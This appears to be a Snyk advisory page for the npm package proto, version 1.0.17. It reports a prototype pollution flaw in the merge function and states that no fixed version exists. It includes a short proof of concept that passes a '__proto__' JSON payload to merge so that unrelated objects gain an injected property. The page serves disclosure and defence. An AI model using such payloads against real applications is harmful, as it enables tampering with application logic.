proto@1.0.17 vulnerabilities

A prototype-based inheritance library that makes it easy to create objects and inheritance hierarchies without losing the power of javascript's prototype system.

latest version

1.0.19

first published

11 years ago

latest version published

9 years ago

licenses detected

Unknown
>=0

View proto package health on Snyk Advisor (opens in a new tab)

Go back to all versions of this package

Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the proto package. This does not include vulnerabilities belonging to this package’s dependencies.

How to fix?

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

Fix for free

Vulnerability Vulnerable Version

Vulnerability	Vulnerable Version
M Prototype Pollution Proto is an An extensible program-code-template for creating objects Affected versions of this package are vulnerable to Prototype Pollution. It is possible to inject pollute the object property of an application using `Proto` by leveraging the `merge` function. PoC `var proto = require('Proto'); var payload = '{"__proto__":{"polluted":"Pollution"}}'; var test = {}; console.log("Before: ", test.polluted); proto.merge({},JSON.parse(payload)); console.log("After: ", test.polluted);` How to fix Prototype Pollution? There is no fixed version for `Proto`.	*

Prototype Pollution

Proto is an An extensible program-code-template for creating objects

Affected versions of this package are vulnerable to Prototype Pollution. It is possible to inject pollute the object property of an application using Proto by leveraging the merge function.

PoC

var proto = require('Proto');
var payload = '{"__proto__":{"polluted":"Pollution"}}';
var test = {};
console.log("Before: ", test.polluted);
proto.merge({},JSON.parse(payload));
console.log("After: ", test.polluted);

How to fix Prototype Pollution?

There is no fixed version for Proto.

Go back to all versions of this package